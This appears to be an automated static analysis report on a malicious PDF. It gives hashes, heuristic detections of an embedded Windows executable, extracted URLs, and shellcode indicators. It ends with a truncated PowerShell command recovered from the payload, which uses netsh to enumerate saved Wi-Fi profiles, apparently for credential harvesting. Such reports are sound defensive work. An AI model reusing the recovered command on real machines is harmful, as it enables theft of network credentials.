Malicious PDF — malware analysis report

Static analysis result for SHA-256 5cf7c0bc27180180…

Verdict: MALICIOUS
File type: PDF
Size: 514.9 KB
Authoring application: pypdf
First seen: 2026-06-11
MD5: 50a587ecfa7deae57fa8742b6f278376
SHA-1: 05ad199d0fdecf47228489495d7ef8cd470dee01
SHA-256: 5cf7c0bc2718018089c71dbca18e30cfde9e2a35bedfed04b80f72b58c658fc9
Risk score: 140

Machine Learning

  • Nyx PDF Classifier: malicious score 0.6145

Heuristics (4)

  • [critical] PDF_EMBEDDED_PE_PAYLOAD: Embedded Windows executable payload in PDF stream
    PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
  • [high] EXTRACTED_FILE_STATIC_TRIAGE: Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • [low] PDF_EMBEDDED: Embedded file
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs (channel: PDF document text):
    • http://%255[^/]%2047s
    • https://%255[^/]%2047s
    • https://cloudflare-dns.com/dns-query?name=%s&type=A
    • https://api.ipify.org

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: dokument.exe
Kind: pdf-embedded-file
Source: PDF EmbeddedFile object 8 at offset 0x2F3
Size: 526005 bytes
SHA-256: 18feee5c259e1a5d2c2ff90e799bbd418817d57f5d047e0628419f1e5579c3e3

Detection
  ClamAV: No threats found
  Obfuscation or payload: likely

Static triage of extracted file
  actual_type=PE; declared_or_context_type=PDF; filename=dokument.exe; kind=pdf-embedded-file
  Static shellcode analysis found candidate code region(s). Indicators: NOP sled, SC_STR_POWERSHELL, SC_STR_VIRTUALPROTECT
  Static shellcode analysis recovered API/import strings: VirtualProtect, CreateProcessA, CreateFileA, CreateThread, InternetOpenA, InternetOpenUrlA
  Static shellcode analysis recovered command string(s): powershell -Command "netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $p=$_; netsh w